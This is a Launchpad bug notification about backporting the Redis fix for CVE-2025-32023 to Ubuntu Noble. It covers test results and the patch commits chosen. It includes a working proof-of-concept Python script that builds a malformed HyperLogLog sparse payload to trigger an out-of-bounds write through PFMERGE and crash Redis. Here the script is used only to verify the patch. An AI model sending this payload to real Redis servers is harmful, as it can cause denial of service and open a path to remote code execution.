** Attachment added: "twd425_poc.py" https://bugs.launchpad.net/ubuntu/+source/redis/+bug/2141721/+attachment/5945724/+files/twd425_poc.py
** Description changed: https://www.cve.org/CVERecord?id=CVE-2025-32023 https://ubuntu.com/security/CVE-2025-32023 Noble is vulnerable. This vulnerability is fixed in 8.0.3, 7.4.5, 7.2.10, and 6.2.19. I tried to trigger it by installing apt-get install redis-server and running `/usr/bin/redis-server --port 30000`. There is a poc here: https://github.com/leesh3288/CVE-2025-32023/blob/main/poc.py I modified it to test make sure we didn't crash redis when input was good. - When using `/usr/bin/redis-server --port 30000`. ``` - ubuntu@launchpad:~$ python3 twd425_poc.py + ubuntu@launchpad:~$ python3 twd425_poc.py Normal merge should work Normal merge is good trigger crash pfmerge failed - as expected with bad input. It crashed. Not patched yet! - ubuntu@launchpad:~$ + ubuntu@launchpad:~$ ``` After patching and running `./src/redis-server --port 30000` ``` - ubuntu@launchpad:~$ python3 twd425_poc.py + ubuntu@launchpad:~$ python3 twd425_poc.py Normal merge should work Normal merge is good trigger crash pfmerge failed - as expected with bad input. It didn't crash. Patched! - ubuntu@launchpad:~$ + ubuntu@launchpad:~$ ``` The fix is based on this pull request in July of 2025 https://github.com/redis/redis/pull/14173 The pull request also fixes CVE-2025-48367. I decided not to include the fix for the other CVE as I have not tested it yet. The official fix for CVE-2025-32023 comes with 2 commits - - c5de37d + - c5de37d - 78d5be1 I only applied c5de37d as that was the minimal change needed to make it work. The other commit, 78d5be1 is to support tcl8.5. Noble comes with tcl8.6 therefore I did not apply the second patch. Built and tested on noble (multipass vm on aarch64) using ``` DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -us -uc ./runtest --single unit/hyperloglog \o/ All tests passed without errors! ``` - - $ cat ~/twd425_poc.py - #!/usr/bin/env python3 - - import redis - - HOST, PORT = 'localhost', 30000 - - try: - r = redis.Redis(HOST, PORT) - r.ping() - except: - print(f"Unable to connect to {HOST}:{PORT}") - exit(1) - - HLL_SPARSE = 1 - - # https://github.com/redis/redis/blob/f35f36a265403c07b119830aa4bb3b7d71653ec9/src/hyperloglog.c#L182 - good = b'' - good += b'HYLL' - good += b'\x01' # encoding - HLL_SPARSE is 1 - good += b'\x00' * 3 # notused 3-bytes - good += b'\x00' * 8 # card 8-bytes - - good += b'\x7f\xfe' # XZERO(16383) , XZERO takes uses 01 and 16383 is represented as 16382, so 01 and 11 1111 1111 1110 - good += b'\x80' # VAL(1,1), where 1vvvvvrr we get 0x80, 10000000, 00000 is 1 for vvvvv and 00 is 1 for rr - r.set('good', good) - - r.pfadd('base', 'alice') - - print("Normal merge should work") - r.pfmerge('merged', 'base', 'good') - print("Normal merge is good") - - bad = b'' - bad += b'HYLL' - bad += b'\x01' # encoding - HLL_SPARSE is 1 - bad += b'\x00' * 3 # notused 3-bytes - bad += b'\x00' * 8 # card 8-bytes - bad += b'\x7f\xff' * 0x20000 # XZERO(16384) x 131072 → overflow i - bad += b'\xff' # VAL(32, 4) → write past buffer - r.set('bad', bad) - - print("trigger crash") - try: - r.pfmerge('merged', 'base', 'bad') - print("pfmerge worked - unexpected. This should not happen!") - exit(1) - except: - print("pfmerge failed - as expected with bad input.") - - - try: - r = redis.Redis(HOST, PORT) - r.ping() - print("It didn't crash. Patched!") - except: - print("It crashed. Not patched yet!") ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/2141721 Title: CVE-2025-32023: Redis allows out of bounds writes in hyperloglog commands leading to RCE To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/redis/+bug/2141721/+subscriptions -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
